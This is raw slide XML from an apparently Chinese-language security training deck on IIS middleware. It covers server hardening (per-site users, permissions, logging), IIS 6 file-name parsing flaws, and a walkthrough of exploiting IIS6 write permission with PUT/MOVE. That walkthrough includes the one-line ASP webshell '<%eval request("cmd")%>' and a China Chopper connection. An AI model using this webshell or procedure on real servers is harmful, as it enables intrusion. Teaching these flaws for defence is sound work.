              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件夹在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>属性配置的安全选项里，添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="50">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IISUSER_01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户权限 </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700"/>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、依次对其他网站及用户同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>样操作</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="106680"/>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、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右击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="7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18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和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="7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18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等盘符</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>选择 作权限</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>。（</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>子目录继承</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>属性中的安全选项，添</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>刚才</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>_G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>禁止该组的所 权限的设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-10">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WebSite01-03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录不要继承父目录的该权限。）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="106680">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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11071" y="609600"/>
            <a:ext cx="7289292" cy="485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471993"/>
            <a:ext cx="11233150" cy="8255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为每个站点设置单独的应用程序池和单独的用户的方法</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="175895">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="99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默认每个网站是独立的应用程序池的一个应用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376" y="2564130"/>
            <a:ext cx="11416284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597723"/>
            <a:ext cx="1123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取消上传目录的可执行脚本的权限的方法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424" y="2058923"/>
            <a:ext cx="6822948" cy="3479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5227" y="3512820"/>
            <a:ext cx="9986772" cy="2956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453683"/>
            <a:ext cx="11233150" cy="118554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235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启用或禁用日志记录，配置日志的记录选项</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="633095">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="918844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服务器日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志</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="633095">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="918844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网站日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志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7011" y="1953767"/>
            <a:ext cx="7467600" cy="430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4520" y="2823972"/>
            <a:ext cx="7322820" cy="331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225" y="610985"/>
            <a:ext cx="8649392" cy="806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4486" y="666064"/>
            <a:ext cx="184975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-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>utline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985" y="1520396"/>
            <a:ext cx="1371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主流的中间件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385" y="1521269"/>
            <a:ext cx="2277110" cy="793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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AV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开发的中间件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9279" y="1443227"/>
            <a:ext cx="8094345" cy="363220"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8094345" h="363219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8093964" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093964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EF7E08">
              <a:alpha val="23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0224" y="1432966"/>
            <a:ext cx="8112759" cy="382905"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8102663" y="382460"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="382460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7404" y="382219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="372935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8102663" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188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63410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="372935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="372935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8111947" y="375056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8104784" y="382219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8102663" y="382460"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905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8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8093138" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19050" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8093138" y="372935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8093138" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8102663" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8102663" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="372935"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8112188" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8102663" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="19050" y="372935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="372935"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8093138" y="372935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19050" y="372935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8093138" y="372935"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8112759" h="382905">
                <a:moveTo>
                  <a:pt x="8112188" y="372935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8093138" y="372935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8102663" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="363410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8112188" y="372935"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="AF5C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126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II</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>II</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的文件名解析漏洞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70723"/>
            <a:ext cx="8016240" cy="409067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IIS5.x-6.x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解析漏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洞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目录解析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(6.0)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形式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.xxx.com/xx.asp/xx.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="16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原理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: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服务器默认会把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.asp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.asa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目录下的文件都解析成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asp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文件解析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9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形式</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.xxx.com/xx.asp;.jpg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原理：服务器默认不解析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;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号后面的内容，因此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xx.asp;.jpg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便被解析成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asp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文件了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解析文件类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型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9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IIS6.0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默认的可执行文件除了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asp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还包含这三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种</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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/test.asa</a:t>
            </a:r>
            <a:endParaRPr sz="16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/test.cer</a:t>
            </a:r>
            <a:endParaRPr sz="16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/test.cdx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9851" y="1470723"/>
            <a:ext cx="9427845" cy="110236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IIS6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写权限的（用到的工具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PUT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Scaner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、桂林老兵写权限利用工具）</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular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、检测目标网站是否存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在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写权限漏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洞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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>打开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IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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Scanner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输入目标网站的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IP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、端口 号（默认为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80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端口），然后点击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="15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800" spc="155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scan”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按钮开始扫描，很快就返回了结果）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55435" y="2610611"/>
            <a:ext cx="5410200" cy="2087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7362" y="1356055"/>
            <a:ext cx="29825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00" spc="21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700" b="1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sz="1700" b="1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、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" b="1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r>
              <a:rPr sz="17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写权限漏洞利用过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="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程</a:t>
            </a:r>
            <a:endParaRPr sz="17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4561" y="1697050"/>
            <a:ext cx="5137150" cy="124085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8450" marR="5080" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="79900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="297815" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="204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lang="en-US" sz="1200" spc="204">
                <a:solidFill>
                  <a:srgbClr val="EF7E08"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>将“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="204">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;%eval request(”cmd“)%&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>这段一句话木马代码保存 成一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>文档，名字随意（比如：命名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>）。接着打 开桂林老兵写权限利用工具，输入目标网站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>或域名，  在“数据包格式”处的下拉菜单中选择“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PUT”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>数据包提交 方式，最后点击“数据包提交”按钮。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="204">
                <a:solidFill>
                  <a:srgbClr val="EF7E08"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	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5408" y="3198573"/>
            <a:ext cx="2598420" cy="585470"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2598420" h="585470">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2598419" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2598419" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="585215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="C4E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3120" y="3956292"/>
            <a:ext cx="5262880" cy="2115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将刚刚上传的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txt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文本修改为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asp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文件：</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" marR="379730" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="79800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1005"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="165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lang="zh-CN" altLang="en-US" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>在“数据包格式”的下拉菜单中选择“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MOVE”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>数据包提交方式，在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Destination”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>处修改文件名称，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>shell.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>， 这里修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cmd.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" spc="165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>。然后点击“提交数据包”按钮</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" spc="165">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" marR="379730" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPct val="79800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1005"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="204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204">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用一句话木马客户端来连接刚上传的一句话木马，可以 功访问</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500" spc="7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500">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>（用菜刀连接）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11695" y="1484375"/>
            <a:ext cx="5158740" cy="2598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1695" y="4299203"/>
            <a:ext cx="515874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8767" y="6071615"/>
            <a:ext cx="2598420" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C4E0F1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109220">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="16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服务器返回了</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="4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201</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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响应码</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-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， </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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这标志着文件改名成</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-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功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8101" y="2921062"/>
            <a:ext cx="3239184" cy="1595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文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3170416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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务器返回了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="45">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
